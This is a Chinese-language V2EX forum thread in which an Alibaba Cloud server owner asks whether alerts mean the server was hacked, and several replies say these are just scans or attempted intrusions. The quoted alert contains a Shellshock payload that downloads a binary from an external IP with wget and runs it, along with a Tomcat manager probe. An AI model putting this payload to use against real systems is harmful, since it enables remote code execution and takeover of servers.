这种情况是不是表示我的服务器被入侵了。

2016-09-24 04:26:56 +08:00
 binghe
服务器是阿里云的ECS,系统是centos 6.5 x64,阿里云盾检测到一次“代码 /命令执行”类型的攻击,攻击特征如下:
我的 IP/ Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://222.174.5.7:1552/hhu -o /tmp/china.z-mvrw. >> /tmp/run.sh;echo echo by china.z >> /tmp/run.sh;echo chmod 777 /tmp/china.z-mvrw. >> /tmp/run.sh;echo /tmp/china.z-mvrw. >> /tmp/run.sh;echo rm -rf /tmp/run.sh >> /tmp/run.sh;chmod 777 /tmp/run.sh;/tmp/run.sh.




还有这样的:
我的 IP/manager/html Match1:/manager/html Match2:get /manager/html http/1.1..content-type: text/html..host: 我的 ip..accept: text/html, */*..user-agent: mozilla/3.0 (compatible; indy library)..authorization: basic og==


请问这样的情况下,我改怎么检查我的服务器,实在不知道要怎么处理了。
/tmp 目录下 200 多个这种类型的文件。
3244 次点击
所在节点    问与答
9 条回复
immjun
2016-09-24 05:01:18 +08:00
云盾有个系统巡检功能吧 再不行可以提工单
lhbc
2016-09-24 05:26:34 +08:00
尝试入侵而已
80 端口不要开 IP 访问
wblinux
2016-09-24 06:33:43 +08:00
云盾的那些应该只是有人尝试入侵,/tmp 目录下那些是你的 php 写的 session 文件。
mrhuiyu
2016-09-24 08:14:03 +08:00
云盾天天在报警= =
Bardon
2016-09-24 09:40:38 +08:00
云盾已经在恐吓你升级你的云盾了。
ck65
2016-09-24 09:42:41 +08:00
阿里没事就从公网扫我的阿里云主机。事逼,丧病。
ragnaroks
2016-09-24 11:20:25 +08:00
建议屏蔽 47.89.*/121.40.*
mdzz
2016-09-24 11:32:46 +08:00
给他返回 404 Bash Not Found
akira
2016-09-24 17:41:20 +08:00
是云盾在扫描而已

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/308599

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX